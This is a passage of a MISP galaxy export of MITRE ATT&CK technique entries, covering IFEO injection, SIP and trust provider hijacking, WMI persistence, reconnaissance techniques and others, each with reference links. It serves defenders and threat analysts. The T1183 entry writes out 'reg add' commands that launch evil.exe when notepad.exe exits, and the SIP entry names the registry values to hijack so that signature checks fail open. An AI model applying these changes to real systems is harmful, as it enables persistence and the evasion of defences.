Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012"

Table 5401. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

https://attack.mitre.org/techniques/T1546/012

https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/

https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview

https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml

https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

Friend/Follow/Connect to targets of interest - T1344

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1344).

Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

The tag is: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344"

Friend/Follow/Connect to targets of interest - T1344 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364" with estimative-language:likelihood-probability="almost-certain"

Table 5402. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1344

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Friend/Follow/Connect to targets of interest - T1364

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1364).

A form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)

The tag is: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364"

Friend/Follow/Connect to targets of interest - T1364 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344" with estimative-language:likelihood-probability="almost-certain"

Table 5403. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1364

Identify personnel with an authority/privilege - T1271

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1271).

Personnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify personnel with an authority/privilege - T1271"

Table 5404. Table References

Links

https://attack.mitre.org/techniques/T1271

Receive KITs/KIQs and determine requirements - T1239

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1239).

Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary’s nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)

The tag is: misp-galaxy:mitre-attack-pattern="Receive KITs/KIQs and determine requirements - T1239"

Table 5405. Table References

Links

https://attack.mitre.org/techniques/T1239

Identify job postings and needs/gaps - T1248

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1248).

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248"

Identify job postings and needs/gaps - T1248 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278" with estimative-language:likelihood-probability="almost-certain"

Table 5406. Table References

Links

https://attack.mitre.org/techniques/T1248

Analyze hardware/software security defensive capabilities - T1294

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1294).

An adversary can probe a victim’s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze hardware/software security defensive capabilities - T1294"

Table 5407. Table References

Links

https://attack.mitre.org/techniques/T1294

Discover target logon/email address format - T1255

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1255).

Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Discover target logon/email address format - T1255"

Table 5408. Table References

Links

https://attack.mitre.org/techniques/T1255

Identify job postings and needs/gaps - T1267

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1267).

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267"

Identify job postings and needs/gaps - T1267 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278" with estimative-language:likelihood-probability="almost-certain"

Table 5409. Table References

Links

https://attack.mitre.org/techniques/T1267

Identify job postings and needs/gaps - T1278

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1278).

Job postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278"

Identify job postings and needs/gaps - T1278 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248" with estimative-language:likelihood-probability="almost-certain"

Table 5410. Table References

Links

https://attack.mitre.org/techniques/T1278

Analyze organizational skillsets and deficiencies - T1300

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1300).

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300"

Analyze organizational skillsets and deficiencies - T1300 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297" with estimative-language:likelihood-probability="almost-certain"

Table 5411. Table References

Links

https://attack.mitre.org/techniques/T1300

Exfiltration Over Other Network Medium - T1011

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011"

Table 5412. Table References

Links

https://attack.mitre.org/techniques/T1011

Network Traffic Capture or Redirection - T1410

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.

Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.

An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device’s proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.

If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

The tag is: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410"

Table 5413. Table References

Links

https://attack.mitre.org/techniques/T1410

https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/

Determine 3rd party infrastructure services - T1260

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1260).

Infrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260"

Determine 3rd party infrastructure services - T1260 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284" with estimative-language:likelihood-probability="almost-certain"

Table 5414. Table References

Links

https://attack.mitre.org/techniques/T1260

Analyze presence of outsourced capabilities - T1303

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1303).

Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze presence of outsourced capabilities - T1303"

Table 5415. Table References

Links

https://attack.mitre.org/techniques/T1303

Boot or Logon Initialization Scripts - T1037

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037"

Table 5416. Table References

Links

https://attack.mitre.org/techniques/T1037

Data from Network Shared Drive - T1039

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039"

Table 5417. Table References

Links

https://attack.mitre.org/techniques/T1039

Download New Code at Runtime - T1407

Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.

On Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s JavascriptInterface capability.

On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch)

The tag is: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407"

Table 5418. Table References

Links

https://attack.mitre.org/techniques/T1407

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html

https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html

Windows Management Instrumentation Event Subscription - T1084

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer’s uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084"

Table 5419. Table References

Links

https://attack.mitre.org/techniques/T1084

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf

https://www.secureworks.com/blog/wmi-persistence

https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

Custom Command and Control Protocol - T1094

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.

The tag is: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094"

Table 5420. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1094

Trusted Developer Utilities Proxy Execution - T1127

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

The tag is: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127"

Table 5421. Table References

Links

http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

https://attack.mitre.org/techniques/T1127

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/

App Delivered via Web Download - T1431

The application is downloaded from an arbitrary web site. A link to the application’s download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Web Download - T1431"

App Delivered via Web Download - T1431 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 5422. Table References

Links

https://attack.mitre.org/techniques/T1431

Image File Execution Options Injection - T1183

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)

  • <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</code>

  • <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</code>

  • <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"</code>

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1183"

Table 5423. Table References

Links

https://attack.mitre.org/techniques/T1183

https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/

https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview

https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml

https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

SIP and Trust Provider Hijacking - T1198

In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

  • Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

  • Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

The tag is: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198"

Table 5424. Table References

Links

http://www.entrust.net/knowledge-base/technote.cfm?tn=8165

https://attack.mitre.org/techniques/T1198

https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)

https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files

https://github.com/mattifestation/PoCSubjectInterfacePackage

https://msdn.microsoft.com/library/ms537359.aspx

https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

File and Directory Permissions Modification - T1222

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222"

Table 5425. Table References

Links

https://attack.mitre.org/techniques/T1222

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior

https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware

https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/

https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Assess leadership areas of interest - T1224

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1224).

Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)

The tag is: misp-galaxy:mitre-attack-pattern="Assess leadership areas of interest - T1224"

Table 5426. Table References

Links

https://attack.mitre.org/techniques/T1224

Determine 3rd party infrastructure services - T1284

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1284).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284"

Determine 3rd party infrastructure services - T1284 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260" with estimative-language:likelihood-probability="almost-certain"

Table 5427. Table References

Links

https://attack.mitre.org/techniques/T1284

Determine highest level tactical element - T1243

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1243).

From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine highest level tactical element - T1243"

Table 5428. Table References

Links

https://attack.mitre.org/techniques/T1243

Determine secondary level tactical element - T1244

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1244).

The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine secondary level tactical element - T1244"

Table 5429. Table References

Links

https://attack.mitre.org/techniques/T1244

Attack PC via USB Connection - T1427

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.

The tag is: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427"

Table 5430. Table References

Links

http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/

http://dl.acm.org/citation.cfm?id=1920314

https://attack.mitre.org/techniques/T1427

https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html

Determine centralization of IT management - T1285

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1285).

